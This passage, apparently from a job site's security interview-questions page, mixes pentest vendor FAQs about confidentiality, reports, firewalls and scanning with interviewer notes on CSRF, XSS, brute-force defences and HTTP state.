and penetration tests is available under exploitation. One safety measure against social engineering
attacks can be trainings for your employees.
 Question 21. What Happens To Confidential Data Redteam Pentesting Gathers During The Penetrat
ion Test?
Answer :
RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-
disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as
confidential is already part of every contract. All customer data, including information that is used to
prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a
penetration test, all data and possible storage media is either securily destroyed or handed back to
the client.
Question 22. Are The Results Written Down In A Report?
Answer :
Every client gets a detailed report at the end of a penetration test. A typical report includes a non-
technical executive summary of the results, to give a short and precise overview of the current status,
followed by a more extensive technical explanation for administrators, developers or other technical
staff.
The individual problems enumerated in the report are separated into a detailed description, a risk
analysis and proposed solutions, to directly give suggestions for improvement.
Question 23. What Other Products And Services Does Redteam Pentesting Offer?
Answer :
RedTeam Pentesting specialises in penetration tests and does not offer any other services. In particular,
no products or services are sold after a penetration test, to guarantee independent and objective test
results. The specialisation also ensures that RedTeam Pentesting's employees have a lot of experience
and expert knowledge for conducting penetration tests.

1. Question 24. Can We Get A List Of Redteam Pentesting's References?

Answer :
Among RedTeam Pentesting's clients are national and international companies of all trades, including
the following:
• Trade & industry
• Banking & insurance companies
• Public administration & authorities
• IT service providers & data centres
Because our customers set a high value on confidentiality, RedTeam Pentesting cannot publish a
reference list. However, to get a first impression of our capabilities you can take a look at a selection
of published testimonials, in which some of our customers report about their experience with
RedTeam Pentesting.
1. Question 25. How Is Redteam Pentesting Different From Other Companies That Offer
Penetration Tests?
Answer :
RedTeam Pentesting specialises exclusively in penetration tests, in contrast to many other companies
in IT-security for which penetration tests are one of many business offerings. As the expertise for
conducting a penetration test with specialized security experts is absent in many cases, quite often
automated security scans are sold as penetration tests. Customers of such service providers most
often receive a printout of the program's findings as the result of the »penetration test«.
 RedTeam Pentesting in contrast employs security specialists who do close teamwork to achieve the
best results. The results are documented in a detailed report by the penetration testers that
performed the test, with the ambition to communicate the necessary knowledge about the
vulnerabilities in an understandable way. For our customers, this means that vulnerabilities can be
better comprehended and issues solved more efficiently. RedTeam Pentesting particularly does not
sell any other services before or after a penetration test. The penetration test should not serve to sell
extra services, but should be an independent security examination.
Additionally, all of RedTeam Pentesting's employees are permanent employees and publicly listed on
our website. Even during workload peaks, no subcontractors or freelancers are hired, to guarantee
the high quality of the tests as well as strict confidentiality.
2. Question 26. In What Countries Does Redteam Pentesting Offer Penetration Tests?
Answer :
RedTeam Pentesting works for many international customers. The project language for penetration
tests is either English or German. Depending on specific customer demands, penetration tests can be
performed locally at the client's premises, or via the Internet or other means of remote access. It is of
course also possible to conduct a penetration test on a client's test system in RedTeam Pentesting's
laboratory, for example in case of a product pentest.

Question 27. What Is Network Penetration Testing?

Answer :
A penetration test, also referred to as “pentest”, is a method of evaluating the security of a computer
system or network by simulating an attack from malicious outsiders (without any authorised means of
accessing the company's networks) but also malicious insiders (who have some level of authorised
access).
The process involves an active analysis of the system for any potential vulnerabilities that could result
from poor or improper system configuration, known and unknown hardware or software flaws, or
operational weaknesses.
The analysis is carried out from the position of a potential hacker and can involve active exploitation of
security vulnerabilities.
Question 28. Is Network Penetration Testing The Same As Network Vulnerability Assessment?
Answer :
There are many names for this type of security service. Network vulnerability assessment, network
audit, network vulnerability scan, network penetration testing, they may all mean the same thing.
BorderSecure is the name of Omniquads Network penetration service.
Question 29. Why Is It Critical To Have An On-going Assessment Of Your Networks’ Security?
Answer :
As new security issues and flaws with different products are made public on a daily basis, it is
important to carry out regular checks in order to maintain a secure network. We check for holes in
your Internet infrastructure, and the ideal way to stay secure on the Internet is to stay ahead of
hackers, at all times.
Question 30. Why Should A Third Party Assess Your System?
Answer :
If you have your own IT department implement your security system, it is to your advantage to let an
impartial third party do the audit. We provide an outsiders view on how easy/difficult it is to
 compromise your integrity. Having an audit report from a third party outlining all confirmed security
vulnerabilities on the network provides invaluable information to any network administrator.
The service is fast, and you will have the advantage of continually knowing how secure your network
is and what you can do to improve it.
Question 31. What Is Omniquad Bordersecure?
Answer :
Omniquad BorderSecure is a service that performs network audits or network penetration testing —
it identifies security vulnerabilities and weaknesses on networks. The information can be used to
assess security, manage risks, and eliminate security vulnerabilities before third parties can take
advantage of potential security holes on your network. Omniquad BorderSecure is a service that can
tell you how hackers can gain access to your networks, and help you prevent such a security breach.
Question 32. We Have A Firewall In Place. Do We Still Need Network Penetration Testing If We Have
A Firewall?
Answer :
The simple answer is yes. Network penetration testing is especially important if you have a Firewall,
as it forms a part of your assessment of your Firewalls efficiency. Performing a network scan or
penetration test when you have a firewall will test the settings on your Firewall. It is important to test
your Firewall each time you have made upgrades or changes to the settings, to ensure it is protecting
your network the way it should.
Question 33. Will Firewalls Interfere With Omniquad Bordersecure?
Answer :
Firewalls are an essential part of network security. Omniquad BorderSecure assesses firewall's
effectiveness in addition to applications and protocols such as web, FTP, and e-mail that are
frequently accessible through firewalls. The system also looks for holes in the firewall; it is often the
case that misconfigured firewalls pose security threats.
Application Security Interview Questions
Question 34. Can I Target Any Ip Address?
Answer :
Yes we can check any and as many IP addresses as you want provided they belong to you. We will not
check any third party IP address.
Question 35. Is Network Penetration Testing Safe?
Answer :
Yes it is completely safe, skilled Omniquad engineers are probing your network from outside your
organisation. However, if there should be any glitches, it is better that it happens under a controlled
sweep of your network since this in itself is exposing network vulnerabilities, some of which could
indicate that your business would be defenceless to Denial of Service attacks.
Question 36. Is The Service Host-based Or Network-based?
Answer :
Omniquad BorderSecure is host-based (on a dedicated server) outside your network. The service
checks your network via the Internet — much like a hacker would try to break into your company
from the outside. This gives you a realistic analysis of your network vulnerabilities.
Question 37. How Many Different Types Of Vulnerabilities Can Omniquad Bordersecure Detect?
Answer :
 Omniquad BorderSecure runs scans and audits on all types of networks. Our team tests new
vulnerabilities for ensuring that our knowledge database remains comprehensive at all times, and
currently we check for up to 1000 different vulnerabilities.
Question 38. What Happens After Omniquad Bordersecure Detects Vulnerabilities On My Network?
Answer :
Omniquad BorderSecure provides a detailed report outlining each vulnerability, including: The
vulnerable host(s), Operating system weaknesses, Level of security risk of the vulnerability,
Description of the vulnerability, Recommendation for correcting the problem.
Question 39. Does Bordersecure Fix Vulnerabilities Found Automatically?
Answer :
No, we point out the weaknesses and recommend solutions. It is not advisable to perform automatic
fixes, even if it was possible, since this could cause a variety of concerns. BorderSecure informs you
about security risks, it is your responsibility to follow up the recommendations to secure your
network perimeter. However, we can offer advice should this be necessary.
1. Question 1. Describe The Last Program Or Script That You Wrote. What Problem Did It Solve?
Answer :
All we want to see here is if the color drains from the guy’s face. If he panics then we not only know
he’s not a programmer (not necessarily bad), but that he’s afraid of programming (bad). I know it’s
controversial, but I think that any high-level security guy needs some programming skills. They don’t
need to be a God at it, but they need to understand the concepts and at least be able to muddle
through some scripting when required.
2. Question 2. How Would You Implement A Secure Login Field On A High Traffic Website
Where Performance Is A Consideration?
Answer :
We’re looking for a basic understanding of the issue of wanting to serve the front page in HTTP, while
needing to present the login form via HTTPs, and how they’d recommend doing that. A key piece of
the answer should center around avoidance of the MiTM threat posed by pure HTTP. Blank stares
here mean that they’ve never seen or heard of this problem, which means they’re not likely to be
anything near pro level.
Network Security Interview Questions
3. Question 3. What Are The Various Ways To Handle Account Brute Forcing?
Answer :
Look for discussion of account lockouts, IP restrictions, fail2ban, etc.
Question 4. What Is Cross-site Request Forgery?
Answer :
Not knowing this is more forgivable than not knowing what XSS is, but only for junior positions. Desired
answer: when an attacker gets a victim’s browser to make requests, ideally with their credentials
included, without their knowing. A solid example of this is when an IMG tag points to a URL associated
with an action.
Example: http://www.wisdomjobs.com/logout/. A victim just loading that page could potentially get
logged out from foo.com, and their browser would have made the action, not them (since browsers load
all IMG tags automatically).

Question 6. If You Were A Site Administrator Looking For Incoming Csrf Attacks, What Would You Look
For?
 Answer :
This is a fun one, as it requires them to set some ground rules. Desired answers are things like, “Did we
already implement nonces?”, or, “That depends on whether we already have controls in place…”
Undesired answers are things like checking referrer headers, or wild panic.
Question 7. What’s The Difference Between Http And Html?
Answer :
Obviously the answer is that one is the networking/application protocol and the other is the markup
language, but again, the main thing you’re looking for is for him not to panic.
Question 8. How Does Http Handle State?
Answer :
It does not, of course. Not natively. Good answers are things like “cookies”, but the best answer is that
cookies are a hack to make up for the fact that HTTP doesn’t do it itself.

Question 9. What Exactly Is Cross Site Scripting?

Answer :
You’d be amazed at how many security people don’t know even the basics of this immensely important
topic. We’re looking for them to say anything regarding an attacker getting a victim to run script content
(usually JavaScript) within their browser.

1. Question 10. What’s The Difference Between Stored And Reflected Xss?
Answer :
Stored is on a static page or pulled from a database and displayed to the user directly. Reflected
comes from the user in the form of a request (usually constructed by an attacker), and then gets run
in the victim’s browser when the results are returned from the site.
2. Question 11. What Are The Common Defenses Against Xss?
Answer :
Input Validation/Output Sanitization, with focus on the latter.